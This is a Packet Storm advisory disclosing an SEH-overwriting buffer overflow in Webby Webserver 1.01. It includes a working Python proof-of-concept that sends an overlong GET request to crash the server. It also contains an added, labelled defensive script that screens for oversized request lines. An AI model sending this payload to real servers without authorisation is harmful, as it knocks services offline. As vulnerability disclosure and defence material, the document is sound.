Webby Webserver 1.01 Buffer Overflow

2010-05-26T00:00:00
ID PACKETSTORM:89942
Type packetstorm
Reporter Michael Messner
Modified 2010-05-26T00:00:00

Description

                                        
---------------------------------------------
  
Webby Webserver v1.01  
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)  
Date: 25.05.2010  
  
---------------------------------------------  
  
- Description  
  
Webby is a small webserver for the windows operating system.  
  
- Buffer overflow vulnerability

The vulnerability can be triggered by sending a specially crafted HTTP GET request. The payload of the attached POC overwrites the SEH with NOPs.
  
- Solution  
  
No known solution available.  
No contact details of the author found.  
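
With no fix available, request lines can be screened in a proxy or log pipeline in front of the server. The following is an added example, not part of the original advisory or of Webby itself: it flags request targets with the shape the POC sends (overlong, non-printable bytes, long runs of one byte). The limits MAX_TARGET_LEN and MAX_RUN_LEN, the name screen_request and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumed policy values (not from the advisory): tune them to the longest
# legitimate URL the protected site really serves.
MAX_TARGET_LEN = 255  # bytes allowed in the request target
MAX_RUN_LEN = 32      # longest tolerated run of one repeated byte

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/\d\.\d\r?\n")
LONG_RUN = re.compile(rb"(.)\1{%d,}" % MAX_RUN_LEN, re.S)

# Constructed samples: one ordinary request and one with the POC's shape
# (absolute-form target, 790 + 4 + 105 filler bytes). 192.0.2.10 is a
# documentation address.
BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
OVERSIZED = (b"GET http://192.0.2.10/" + b"A" * 790 + b"\x90" * 4
             + b"\x42" * 105 + b" HTTP/1.0\r\n\r\n")


def screen_request(raw):
    """Return the reasons to reject raw request bytes (empty list = pass)."""
    m = REQUEST_LINE.match(raw)
    if m is None:
        return ["malformed request line"]
    # Measure the whole target, so the absolute form (GET http://host/path)
    # and the origin form (GET /path) are held to the same limit.
    target = m.group(2)
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("target length %d exceeds %d"
                       % (len(target), MAX_TARGET_LEN))
    if any(b < 0x21 or b > 0x7E for b in target):
        reasons.append("non-printable byte in target")
    if LONG_RUN.search(target):
        reasons.append("run of more than %d identical bytes" % MAX_RUN_LEN)
    return reasons


if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, screen_request(raw) or "pass")
```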
  
- Credits  
  
The vulnerability was discovered by Michael Messner from Integralis  
michael#dot#messner#at#integralis#dot#com  
  
- Timeline  
  
25.05.2010 - Vulnerability discovered  
  
- Reference  
  
Download vulnerable software  
http://www.shareware.de/webby-webserver/  
  
- POC  
  
#!/usr/bin/python
# Python 2 script

import socket
import sys
import os.path
import time

# Both the IP and the port are required
if len(sys.argv) < 3:
    print "Usage: webby.py <IP> <port>"
    sys.exit(0)

ips = sys.argv[1]
port = int(sys.argv[2])

# Overlong request path; the description states the SEH is overwritten with NOPs
string = "A"*790
string += "\x90"*4
string += "\x42"*105

method = "GET"
print "starting POC for:", ips
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except socket.error:
    print "no connection possible"
    sys.exit(1)

# Request line with an absolute-form URL followed by an empty header block
payload = method + ' http://' + ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'

print "\r\nsending payload"
print "\n\rusing method %s with buffersize of: %s" % (method, str(len(string)))
print "..."

print payload
s.send(payload)
print "finished with method %s and payload %s" % (method, payload)
print "... check SEH"